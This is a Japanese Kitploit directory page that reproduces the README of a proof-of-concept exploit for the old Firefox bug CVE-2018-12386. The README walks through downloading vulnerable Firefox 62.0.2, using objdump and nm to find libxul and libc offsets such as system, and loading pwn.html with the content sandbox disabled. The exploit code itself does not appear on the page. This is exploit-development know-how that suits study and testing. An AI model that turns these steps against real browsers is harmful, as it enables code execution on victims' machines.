Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
cve-2018-12386 — CVE-2018-12386 - Firefox Sandboxed RCE Exploit for Linux (Firefox <v62.0.3) | Kitploit
ツール/GitHubGitHub/0xlyte/cve-2018-12386
脆弱性分析エクスプロイト学習と教育ペイロード開発バイナリエクスプロイト
GitHub0xlyte/cve-2018-12386

cve-2018-12386

CVE-2018-12386 - Firefox Sandboxed RCE Exploit for Linux (Firefox <v62.0.3)

リポジトリを見る
26年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

Firefox サンドボックス内 RCE エクスプロイト (CVE-2018-12386)

これは、Niklas Baumstark、Samuel Groß、Bruno Keith によって発見された脆弱性 CVE-2018-12386 のシンプルなエクスプロイトです。

これはほとんどが娯楽目的で作成した PoC であり、サンドボックス回避はなく、エクスプロイトで使用されるオフセットが既知の特定の Linux 環境でのみ動作します(オフセットは exploit/offsets.js で変更できます)。

このエクスプロイトは、Firefox 62.0.3 以前および Firefox ESR 60.2.2 以前のバージョンで動作します。

エクスプロイトテスト用の Firefox のダウンロード

過去の Firefox リリースは Mozilla の FTP サーバーから直接ダウンロードできます:https://ftp.mozilla.org/pub/firefox/releases/

例えば、64ビット Linux 用の 62.0.2 バージョンを使用できます:https://ftp.mozilla.org/pub/firefox/releases/62.0.2/linux-x86_64/en-US/firefox-62.0.2.tar.bz2。

root@kitploit:~
wget https://ftp.mozilla.org/pub/firefox/releases/62.0.2/linux-x86_64/en-US/firefox-62.0.2.tar.bz2
bzip2 -d firefox-62.0.2.tar.bz2
tar xvf firefox-62.0.2.tar

オフセットの特定

のオフセット

libxul.so

libxul_math_max

Firefox 62.0.2 を使用している場合、exploit/offsets.js で提供されているオフセットが正しいはずです。

他のバージョンの場合、簡単な方法は addrof プリミティブを使用して JavaScript 関数 Math.max のアドレスを漏洩させ、次に現在エクスプロイト対象の Firefox インスタンスの libxul.so のベースアドレスを(例えば cat /proc/$(pidof firefox)/maps で)取得し、その差を引いて libxul_math_max オフセットを求めることです。

libxul_got_memmove と libxul_got_tolower

Firefox 62.0.2 を使用している場合、exploit/offsets.js で提供されているオフセットが正しいはずです。

他のバージョンでは、objdump を使用するのが簡単な方法です。

root@kitploit:~
[lyte@vm firefox-62.0.2]$ objdump -d libxul.so | grep -i memmove@GLIBC
  8006f0:   ff 25 7a ac 40 05       jmpq   *0x540ac7a(%rip)        # 5c0b370 <memmove@GLIBC_2.2.5>

[lyte@vm firefox-62.0.2]$ objdump -d libxul.so | grep -i tolower@GLIBC
  8052e0:	ff 25 82 86 40 05    	jmpq   *0x5408682(%rip)        # 5c0d968 <tolower@GLIBC_2.2.5>

5c0b370 と 5c0d968 が必要な値、つまり libxul.so 内の memmove と tolower のオフセットです。

libc.so.6 のオフセット

これらのオフセットは、使用している libc のバージョンに完全に依存します。

root@kitploit:~
# libc.so.6 location

[lyte@vm firefox-62.0.2]$ ldd /bin/ls | grep libc.so.6 | cut -d' ' -f3
/lib/x86_64-linux-gnu/libc.so.6

libc_tolower

root@kitploit:~
[lyte@vm firefox-62.0.2]$ nm -D /lib/x86_64-linux-gnu/libc.so.6 | grep " tolower$"
000000000002c0f0 T tolower

libc_system

root@kitploit:~
[lyte@vm firefox-62.0.2]$ nm -D /lib/x86_64-linux-gnu/libc.so.6 | grep " system$"
000000000003f480 W system

エクスプロイトのテスト

Firefox と正しいオフセットを用意したら、以下のコマンドを実行してエクスプロイトをテストできます:

root@kitploit:~
MOZ_DISABLE_CONTENT_SANDBOX=1 /path/to/vulnerable/firefox /path/to/cve-2018-12386/exploit/pwn.html

Demo

連絡先

ご連絡はこちらまで:@lyte__

ツールをダウンロード